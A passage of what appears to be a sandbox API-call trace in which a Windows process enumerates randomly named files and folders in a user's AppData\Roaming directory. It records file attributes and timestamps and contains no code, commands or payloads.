cAlternateFileName="EFARQ4~1.MP3")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c908ec0, ftCreationTime.dwHighDateTime=0x1d7dbb1, ftLastAccessTime.dwLowDateTime=0x90948ca0, ftLastAccessTime.dwHighDateTime=0x1d7deaa, ftLastWriteTime.dwLowDateTime=0x90948ca0, ftLastWriteTime.dwHighDateTime=0x1d7deaa, nFileSizeHigh=0x0, nFileSizeLow=0xbf5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gyOdTm8Tl4T31VO3P9.wav", cAlternateFileName="GYODTM~1.WAV")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5db2a9e0, ftCreationTime.dwHighDateTime=0x1d7e18c, ftLastAccessTime.dwLowDateTime=0xb2badd50, ftLastAccessTime.dwHighDateTime=0x1d7e401, ftLastWriteTime.dwLowDateTime=0xb2badd50, ftLastWriteTime.dwHighDateTime=0x1d7e401, nFileSizeHigh=0x0, nFileSizeLow=0x1013e, dwReserved0=0x0, dwReserved1=0x0, cFileName="hVoaVxJ.mkv", cAlternateFileName="")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f86d90, ftCreationTime.dwHighDateTime=0x1d7d7b0, ftLastAccessTime.dwLowDateTime=0xffddf560, ftLastAccessTime.dwHighDateTime=0x1d7e201, ftLastWriteTime.dwLowDateTime=0xffddf560, ftLastWriteTime.dwHighDateTime=0x1d7e201, nFileSizeHigh=0x0, nFileSizeLow=0x6dc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="IiqLEvPwdtberm_hQtg.gif", cAlternateFileName="IIQLEV~1.GIF")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef0bfd0, ftCreationTime.dwHighDateTime=0x1d7e2d1, ftLastAccessTime.dwLowDateTime=0xe95407e0, ftLastAccessTime.dwHighDateTime=0x1d7e331, ftLastWriteTime.dwLowDateTime=0xe95407e0, ftLastWriteTime.dwHighDateTime=0x1d7e331, nFileSizeHigh=0x0, nFileSizeLow=0x119b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmKyzoGS.odp", cAlternateFileName="")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dc6b80, ftCreationTime.dwHighDateTime=0x1d7dd0e, ftLastAccessTime.dwLowDateTime=0x2466a6f0, ftLastAccessTime.dwHighDateTime=0x1d7e141, ftLastWriteTime.dwLowDateTime=0x2466a6f0, ftLastWriteTime.dwHighDateTime=0x1d7e141, nFileSizeHigh=0x0, nFileSizeLow=0x18ee9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ku4SefOZNuFNZSBxX.mp3", cAlternateFileName="KU4SEF~1.MP3")) returned 1 [0307.656] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4991260, ftCreationTime.dwHighDateTime=0x1d7dae2, ftLastAccessTime.dwLowDateTime=0x5648fb50, ftLastAccessTime.dwHighDateTime=0x1d7e673, ftLastWriteTime.dwLowDateTime=0x5648fb50, ftLastWriteTime.dwHighDateTime=0x1d7e673, nFileSizeHigh=0x0, nFileSizeLow=0x11a0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lT R.mp4", cAlternateFileName="LTR~1.MP4")) returned 1 [0307.656] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0307.656] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdd4b170, ftCreationTime.dwHighDateTime=0x1d7e4b9, ftLastAccessTime.dwLowDateTime=0x6b098f20, ftLastAccessTime.dwHighDateTime=0x1d7e572, ftLastWriteTime.dwLowDateTime=0x6b098f20, ftLastWriteTime.dwHighDateTime=0x1d7e572, nFileSizeHigh=0x0, nFileSizeLow=0x17d83, dwReserved0=0x0, dwReserved1=0x0, cFileName="MlwZ3 5B.flv", cAlternateFileName="MLWZ35~1.FLV")) returned 1 [0307.656] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0332cf0, ftCreationTime.dwHighDateTime=0x1d7e4dd, ftLastAccessTime.dwLowDateTime=0x53578f80, ftLastAccessTime.dwHighDateTime=0x1d7e5a9, ftLastWriteTime.dwLowDateTime=0x53578f80, ftLastWriteTime.dwHighDateTime=0x1d7e5a9, nFileSizeHigh=0x0, nFileSizeLow=0x18f52, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSKdXWbMNdBdxPo0.png", cAlternateFileName="MSKDXW~1.PNG")) returned 1 [0307.656] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac79990, ftCreationTime.dwHighDateTime=0x1d7e571, ftLastAccessTime.dwLowDateTime=0x38d97160, ftLastAccessTime.dwHighDateTime=0x1d7e5fd, ftLastWriteTime.dwLowDateTime=0x38d97160, ftLastWriteTime.dwHighDateTime=0x1d7e5fd, nFileSizeHigh=0x0, nFileSizeLow=0xd1cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="oxMLhE1-J 5hfFEY8z.mkv", cAlternateFileName="OXMLHE~1.MKV")) returned 1 [0307.657] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba780e30, ftCreationTime.dwHighDateTime=0x1d7e1fb, ftLastAccessTime.dwLowDateTime=0x260f36f0, ftLastAccessTime.dwHighDateTime=0x1d7e3eb, ftLastWriteTime.dwLowDateTime=0x260f36f0, ftLastWriteTime.dwHighDateTime=0x1d7e3eb, nFileSizeHigh=0x0, nFileSizeLow=0xcc04, dwReserved0=0x0, dwReserved1=0x0, cFileName="pSmOfjTm1Z7Y.xls", cAlternateFileName="PSMOFJ~1.XLS")) returned 1 [0307.657] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8b1770, ftCreationTime.dwHighDateTime=0x1d7e4e2, ftLastAccessTime.dwLowDateTime=0x148cd2c0, ftLastAccessTime.dwHighDateTime=0x1d7e5df, ftLastWriteTime.dwLowDateTime=0x148cd2c0, ftLastWriteTime.dwHighDateTime=0x1d7e5df, nFileSizeHigh=0x0, nFileSizeLow=0x7f94, dwReserved0=0x0, dwReserved1=0x0, cFileName="rL3Qp_tDR-lwqAu8ivr6.png", cAlternateFileName="RL3QP_~1.PNG")) returned 1 [0307.657] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x484bdd30, ftCreationTime.dwHighDateTime=0x1d7dbf9, ftLastAccessTime.dwLowDateTime=0x3e703690, ftLastAccessTime.dwHighDateTime=0x1d7e76a, ftLastWriteTime.dwLowDateTime=0x3e703690, ftLastWriteTime.dwHighDateTime=0x1d7e76a, nFileSizeHigh=0x0, nFileSizeLow=0x9d7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="rwqHIkEdYEi_jog.mp4", cAlternateFileName="RWQHIK~1.MP4")) returned 1 [0307.657] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb99a70, ftCreationTime.dwHighDateTime=0x1d7d87b, ftLastAccessTime.dwLowDateTime=0x7ba8e480, ftLastAccessTime.dwHighDateTime=0x1d7dc66, ftLastWriteTime.dwLowDateTime=0x7ba8e480, ftLastWriteTime.dwHighDateTime=0x1d7dc66, nFileSizeHigh=0x0, nFileSizeLow=0x16085, dwReserved0=0x0, dwReserved1=0x0, cFileName="sixqoI0m.xlsx", cAlternateFileName="SIXQOI~1.XLS")) returned 1 [0307.657] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc656eed0, ftCreationTime.dwHighDateTime=0x1d7df51, ftLastAccessTime.dwLowDateTime=0xb4b93410, ftLastAccessTime.dwHighDateTime=0x1d7e61f, ftLastWriteTime.dwLowDateTime=0xb4b93410, ftLastWriteTime.dwHighDateTime=0x1d7e61f, nFileSizeHigh=0x0, nFileSizeLow=0xda23, dwReserved0=0x0, dwReserved1=0x0, cFileName="v4hZ-TlKltopmm.mp4", cAlternateFileName="V4HZ-T~1.MP4")) returned 1 [0307.657] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c00a20, ftCreationTime.dwHighDateTime=0x1d7dfca, ftLastAccessTime.dwLowDateTime=0xd6d5ecf0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0xd6d5ecf0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="yUlO-j d6_Ha.pps", cAlternateFileName="YULO-J~1.PPS")) returned 1 [0307.658] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d691b90, ftCreationTime.dwHighDateTime=0x1d7d7b9, ftLastAccessTime.dwLowDateTime=0x81695a80, ftLastAccessTime.dwHighDateTime=0x1d7de0f, ftLastWriteTime.dwLowDateTime=0x81695a80, ftLastWriteTime.dwHighDateTime=0x1d7de0f, nFileSizeHigh=0x0, nFileSizeLow=0x9b7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZSAFh.swf", cAlternateFileName="")) returned 1 [0307.658] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f1d70, ftCreationTime.dwHighDateTime=0x1d7da0a, ftLastAccessTime.dwLowDateTime=0xa2467cd0, ftLastAccessTime.dwHighDateTime=0x1d7dc28, ftLastWriteTime.dwLowDateTime=0xa2467cd0, ftLastWriteTime.dwHighDateTime=0x1d7dc28, nFileSizeHigh=0x0, nFileSizeLow=0x96de, dwReserved0=0x0, dwReserved1=0x0, cFileName="_KBh2MkVK-1OboakSPw0.mkv", cAlternateFileName="_KBH2M~1.MKV")) returned 1 [0307.658] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.658] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.658] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0307.658] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\", lpFilePart=0x0) returned 0x26 [0307.659] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f7168b0, ftCreationTime.dwHighDateTime=0x1d7d7fb, ftLastAccessTime.dwLowDateTime=0xdaa84840, ftLastAccessTime.dwHighDateTime=0x1d7e0d0, ftLastWriteTime.dwLowDateTime=0xdaa84840, ftLastWriteTime.dwHighDateTime=0x1d7e0d0, nFileSizeHigh=0x0, nFileSizeLow=0x293c, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LklvNehR.docx", cAlternateFileName="0LKLVN~1.DOC")) returned 1 [0307.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7f7d90, ftCreationTime.dwHighDateTime=0x1d7e1d9, ftLastAccessTime.dwLowDateTime=0x9686a720, ftLastAccessTime.dwHighDateTime=0x1d7e4cb, ftLastWriteTime.dwLowDateTime=0x9686a720, ftLastWriteTime.dwHighDateTime=0x1d7e4cb, nFileSizeHigh=0x0, nFileSizeLow=0x8152, dwReserved0=0x0, dwReserved1=0x0, cFileName="4f1_b1f1MI-TC9ElavwZ.gif", cAlternateFileName="4F1_B1~1.GIF")) returned 1 [0307.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8671e3a0, ftCreationTime.dwHighDateTime=0x1d7e4c5, ftLastAccessTime.dwLowDateTime=0xb4c186d0, ftLastAccessTime.dwHighDateTime=0x1d7e582, ftLastWriteTime.dwLowDateTime=0xb4c186d0, ftLastWriteTime.dwHighDateTime=0x1d7e582, nFileSizeHigh=0x0, nFileSizeLow=0xe27b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5OX_uRta.avi", cAlternateFileName="")) returned 1 [0307.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e08eb70, ftCreationTime.dwHighDateTime=0x1d7d96f, ftLastAccessTime.dwLowDateTime=0x96266160, ftLastAccessTime.dwHighDateTime=0x1d7deba, ftLastWriteTime.dwLowDateTime=0x96266160, ftLastWriteTime.dwHighDateTime=0x1d7deba, nFileSizeHigh=0x0, nFileSizeLow=0x2cb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8g0k0m8yj.png", cAlternateFileName="8G0K0M~1.PNG")) returned 1 [0307.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0307.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18a8ae90, ftCreationTime.dwHighDateTime=0x1d7e037, ftLastAccessTime.dwLowDateTime=0xad7653e0, ftLastAccessTime.dwHighDateTime=0x1d7e1f1, ftLastWriteTime.dwLowDateTime=0xad7653e0, ftLastWriteTime.dwHighDateTime=0x1d7e1f1, nFileSizeHigh=0x0, nFileSizeLow=0x10a1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ahc LlOV.wav", cAlternateFileName="AHCLLO~1.WAV")) returned 1 [0307.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d817c90, ftCreationTime.dwHighDateTime=0x1d7e403, ftLastAccessTime.dwLowDateTime=0x9ba77510, ftLastAccessTime.dwHighDateTime=0x1d7e5a0, ftLastWriteTime.dwLowDateTime=0x9ba77510, ftLastWriteTime.dwHighDateTime=0x1d7e5a0, nFileSizeHigh=0x0, nFileSizeLow=0xee87, dwReserved0=0x0, dwReserved1=0x0, cFileName="awN7g2jy-.wav", cAlternateFileName="AWN7G2~1.WAV")) returned 1 [0307.661] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x619c9b70, ftCreationTime.dwHighDateTime=0x1d7d9cf, ftLastAccessTime.dwLowDateTime=0x7d05da70, ftLastAccessTime.dwHighDateTime=0x1d7dc7c, ftLastWriteTime.dwLowDateTime=0x7d05da70, ftLastWriteTime.dwHighDateTime=0x1d7dc7c, nFileSizeHigh=0x0, nFileSizeLow=0x626f, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3G HOo r0SeaIBT.csv", cAlternateFileName="B3GHOO~1.CSV")) returned 1 [0307.661] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454ae260, ftCreationTime.dwHighDateTime=0x1d7e050, ftLastAccessTime.dwLowDateTime=0x2735dda0, ftLastAccessTime.dwHighDateTime=0x1d7e651, ftLastWriteTime.dwLowDateTime=0x2735dda0, ftLastWriteTime.dwHighDateTime=0x1d7e651, nFileSizeHigh=0x0, nFileSizeLow=0xed4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="EFaRQ41J5EALf7Lll.mp3", cAlternateFileName="EFARQ4~1.MP3")) returned 1 [0307.661] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c908ec0, ftCreationTime.dwHighDateTime=0x1d7dbb1, ftLastAccessTime.dwLowDateTime=0x90948ca0, ftLastAccessTime.dwHighDateTime=0x1d7deaa, ftLastWriteTime.dwLowDateTime=0x90948ca0, ftLastWriteTime.dwHighDateTime=0x1d7deaa, nFileSizeHigh=0x0, nFileSizeLow=0xbf5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gyOdTm8Tl4T31VO3P9.wav", cAlternateFileName="GYODTM~1.WAV")) returned 1 [0307.661] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5db2a9e0, ftCreationTime.dwHighDateTime=0x1d7e18c, ftLastAccessTime.dwLowDateTime=0xb2badd50, ftLastAccessTime.dwHighDateTime=0x1d7e401, ftLastWriteTime.dwLowDateTime=0xb2badd50, ftLastWriteTime.dwHighDateTime=0x1d7e401, nFileSizeHigh=0x0, nFileSizeLow=0x1013e, dwReserved0=0x0, dwReserved1=0x0, cFileName="hVoaVxJ.mkv", cAlternateFileName="")) returned 1 [0307.661] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f86d90, ftCreationTime.dwHighDateTime=0x1d7d7b0, ftLastAccessTime.dwLowDateTime=0xffddf560, ftLastAccessTime.dwHighDateTime=0x1d7e201, ftLastWriteTime.dwLowDateTime=0xffddf560, ftLastWriteTime.dwHighDateTime=0x1d7e201, nFileSizeHigh=0x0, nFileSizeLow=0x6dc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="IiqLEvPwdtberm_hQtg.gif", cAlternateFileName="IIQLEV~1.GIF")) returned 1 [0307.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef0bfd0, ftCreationTime.dwHighDateTime=0x1d7e2d1, ftLastAccessTime.dwLowDateTime=0xe95407e0, ftLastAccessTime.dwHighDateTime=0x1d7e331, ftLastWriteTime.dwLowDateTime=0xe95407e0, ftLastWriteTime.dwHighDateTime=0x1d7e331, nFileSizeHigh=0x0, nFileSizeLow=0x119b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmKyzoGS.odp", cAlternateFileName="")) returned 1 [0307.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dc6b80, ftCreationTime.dwHighDateTime=0x1d7dd0e, ftLastAccessTime.dwLowDateTime=0x2466a6f0, ftLastAccessTime.dwHighDateTime=0x1d7e141, ftLastWriteTime.dwLowDateTime=0x2466a6f0, ftLastWriteTime.dwHighDateTime=0x1d7e141, nFileSizeHigh=0x0, nFileSizeLow=0x18ee9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ku4SefOZNuFNZSBxX.mp3", cAlternateFileName="KU4SEF~1.MP3")) returned 1 [0307.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4991260, ftCreationTime.dwHighDateTime=0x1d7dae2, ftLastAccessTime.dwLowDateTime=0x5648fb50, ftLastAccessTime.dwHighDateTime=0x1d7e673, ftLastWriteTime.dwLowDateTime=0x5648fb50, ftLastWriteTime.dwHighDateTime=0x1d7e673, nFileSizeHigh=0x0, nFileSizeLow=0x11a0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lT R.mp4", cAlternateFileName="LTR~1.MP4")) returned 1 [0307.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0307.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdd4b170, ftCreationTime.dwHighDateTime=0x1d7e4b9, ftLastAccessTime.dwLowDateTime=0x6b098f20, ftLastAccessTime.dwHighDateTime=0x1d7e572, ftLastWriteTime.dwLowDateTime=0x6b098f20, ftLastWriteTime.dwHighDateTime=0x1d7e572, nFileSizeHigh=0x0, nFileSizeLow=0x17d83, dwReserved0=0x0, dwReserved1=0x0, cFileName="MlwZ3 5B.flv", cAlternateFileName="MLWZ35~1.FLV")) returned 1 [0307.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0332cf0, ftCreationTime.dwHighDateTime=0x1d7e4dd, ftLastAccessTime.dwLowDateTime=0x53578f80, ftLastAccessTime.dwHighDateTime=0x1d7e5a9, ftLastWriteTime.dwLowDateTime=0x53578f80, ftLastWriteTime.dwHighDateTime=0x1d7e5a9, nFileSizeHigh=0x0, nFileSizeLow=0x18f52, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSKdXWbMNdBdxPo0.png", cAlternateFileName="MSKDXW~1.PNG")) returned 1 [0307.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac79990, ftCreationTime.dwHighDateTime=0x1d7e571, ftLastAccessTime.dwLowDateTime=0x38d97160, ftLastAccessTime.dwHighDateTime=0x1d7e5fd, ftLastWriteTime.dwLowDateTime=0x38d97160, ftLastWriteTime.dwHighDateTime=0x1d7e5fd, nFileSizeHigh=0x0, nFileSizeLow=0xd1cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="oxMLhE1-J 5hfFEY8z.mkv", cAlternateFileName="OXMLHE~1.MKV")) returned 1 [0307.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba780e30, ftCreationTime.dwHighDateTime=0x1d7e1fb, ftLastAccessTime.dwLowDateTime=0x260f36f0, ftLastAccessTime.dwHighDateTime=0x1d7e3eb, ftLastWriteTime.dwLowDateTime=0x260f36f0, ftLastWriteTime.dwHighDateTime=0x1d7e3eb, nFileSizeHigh=0x0, nFileSizeLow=0xcc04, dwReserved0=0x0, dwReserved1=0x0, cFileName="pSmOfjTm1Z7Y.xls", cAlternateFileName="PSMOFJ~1.XLS")) returned 1 [0307.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8b1770, ftCreationTime.dwHighDateTime=0x1d7e4e2, ftLastAccessTime.dwLowDateTime=0x148cd2c0, ftLastAccessTime.dwHighDateTime=0x1d7e5df, ftLastWriteTime.dwLowDateTime=0x148cd2c0, ftLastWriteTime.dwHighDateTime=0x1d7e5df, nFileSizeHigh=0x0, nFileSizeLow=0x7f94, dwReserved0=0x0, dwReserved1=0x0, cFileName="rL3Qp_tDR-lwqAu8ivr6.png", cAlternateFileName="RL3QP_~1.PNG")) returned 1 [0307.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x484bdd30, ftCreationTime.dwHighDateTime=0x1d7dbf9, ftLastAccessTime.dwLowDateTime=0x3e703690, ftLastAccessTime.dwHighDateTime=0x1d7e76a, ftLastWriteTime.dwLowDateTime=0x3e703690, ftLastWriteTime.dwHighDateTime=0x1d7e76a, nFileSizeHigh=0x0, nFileSizeLow=0x9d7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="rwqHIkEdYEi_jog.mp4", cAlternateFileName="RWQHIK~1.MP4")) returned 1 [0307.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb99a70, ftCreationTime.dwHighDateTime=0x1d7d87b, ftLastAccessTime.dwLowDateTime=0x7ba8e480, 